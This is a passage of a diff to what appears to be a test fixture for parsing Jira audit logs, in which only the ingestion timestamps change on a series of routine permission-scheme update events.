"2021-12-08T14:50:33.590280492Z", + "ingested": "2021-12-15T09:00:40.254628174Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.231Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1821,7 +1815,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590283076Z", + "ingested": "2021-12-15T09:00:40.254629408Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.229Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1890,7 +1884,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590285661Z", + "ingested": "2021-12-15T09:00:40.254630703Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.227Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1964,7 +1958,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590288236Z", + "ingested": "2021-12-15T09:00:40.254631930Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.225Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2033,7 +2027,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590290817Z", + "ingested": "2021-12-15T09:00:40.254633145Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.223Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2102,7 +2096,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590293465Z", + "ingested": "2021-12-15T09:00:40.254634320Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.221Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2176,7 +2170,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590296195Z", + "ingested": "2021-12-15T09:00:40.254636006Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.219Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2245,7 +2239,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590298766Z", + "ingested": "2021-12-15T09:00:40.254637184Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.217Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2319,7 +2313,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590301315Z", + "ingested": "2021-12-15T09:00:40.254638409Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.215Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2388,7 +2382,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590303871Z", + "ingested": "2021-12-15T09:00:40.254639618Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.212Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2462,7 +2456,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590306583Z", + "ingested": "2021-12-15T09:00:40.254640990Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.210Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2536,7 +2530,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590309166Z", + "ingested": "2021-12-15T09:00:40.254642170Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.208Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Voters and Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2605,7 +2599,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590311711Z", + "ingested": "2021-12-15T09:00:40.254643734Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.204Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Modify Reporter\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2679,7 +2673,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590314341Z", + "ingested": "2021-12-15T09:00:40.254645027Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.190Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Schedule Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2748,7 +2742,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590316909Z", + "ingested": "2021-12-15T09:00:40.254646212Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.187Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Move Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2817,7 +2811,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590319467Z", + "ingested": "2021-12-15T09:00:40.254647469Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.184Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Administer Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2891,7 +2885,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590322068Z", + "ingested": "2021-12-15T09:00:40.254648648Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.182Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Link Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2960,7 +2954,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590324602Z", + "ingested": "2021-12-15T09:00:40.254649896Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.180Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Work On Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3029,7 +3023,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590327144Z", + "ingested": "2021-12-15T09:00:40.254651176Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.178Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3098,7 +3092,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590333834Z", + "ingested": "2021-12-15T09:00:40.254652362Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.176Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Close Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3167,7 +3161,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590336662Z", + "ingested": "2021-12-15T09:00:40.254653587Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.174Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assignable User\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3236,7 +3230,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590339200Z", + "ingested": "2021-12-15T09:00:40.254654869Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.173Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3310,7 +3304,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590341794Z", + "ingested": "2021-12-15T09:00:40.254656062Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.171Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Add Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3379,7 +3373,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590344375Z", + "ingested": "2021-12-15T09:00:40.254657250Z", "original": 